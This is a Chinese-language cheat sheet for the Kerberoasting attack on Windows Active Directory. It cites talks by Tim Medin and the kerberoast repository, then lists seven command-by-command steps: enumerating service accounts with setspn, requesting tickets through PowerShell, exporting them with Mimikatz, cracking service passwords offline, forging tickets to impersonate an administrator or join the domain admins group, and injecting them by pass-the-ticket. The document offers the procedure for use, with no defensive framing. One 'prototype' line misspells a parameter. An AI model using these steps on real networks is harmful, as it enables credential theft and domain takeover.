1. http://securityweekly.com/2014/09/26/derbycon-attacking-kerberos-talk-ill-be-checking-out-and-you-should-too/
2. https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
3. https://github.com/nidem/kerberoast
方法:
1. 查找服务账户
setspn -T DOMAINNAME -F -Q */*
2. 识别user账户,忽略机器账户,通常机器账户密码不太容易破解
3. 获得ticket
PS C:\> Add-Type -AssemblyName System.IdentityModel PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
原型是:
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -Arguemtlist “HTTP / YOURKERB SERVER”
4. 使用Mimikatz从RAM中获得tickets
mimikatz# kerberos::list /export
5. 离线破解服务口令
tgsrepcrack.py -w wordlist.txt *.kirbi
6. 将user伪装成另一个user
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500
或者把user加入一个组(本例为admin组)
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512
7. 使用Mimikatz注入内存
kerberos::ptt sql.kirbi